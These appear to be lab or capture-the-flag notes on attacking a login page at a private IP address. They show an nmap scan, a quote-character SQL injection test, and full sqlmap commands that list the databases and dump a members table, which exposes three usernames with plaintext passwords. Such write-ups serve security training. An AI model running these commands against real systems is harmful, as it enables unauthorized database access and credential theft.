NMAP target - shows port 80 open running webserver

UNAME = admin
PASSWD = '

ERROR MESSAGE from login
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

shows mySQL error - vulnerable to SQL injection

URL changes to http://192.168.32.49/checklogin.php

///////////////////
SQLmap
///////////////////
COMMAND USED
sqlmap -u "http://192.168.32.49/checklogin.php" --data "myusername=%27&mypassword=%27&Submit=Login" --risk=3 --level=5 -dbs

-u = Specify target URL
--risk=3 = detection more likely if higher as performs risky attacks
--data = specify what data to query to the SQL server
-dbs = list database names found
Databases Found
/////////////////
information_schema
members
mysql
/////////////////

sqlmap -u "http://192.168.32.49/checklogin.php" --data "myusername=%27&mypassword=%27&Submit=Login" -D members --dump

--dump = display all info after scan has finished
 USER ACCOUNTS
 //////////////////
 UNAME: one
 PASSWD : JumpUpnDown
 
 UNAME: two
 PASSWD: Auf!wiedersehen
 
 UNAME: three
 PASSWD: easy1230
 
 
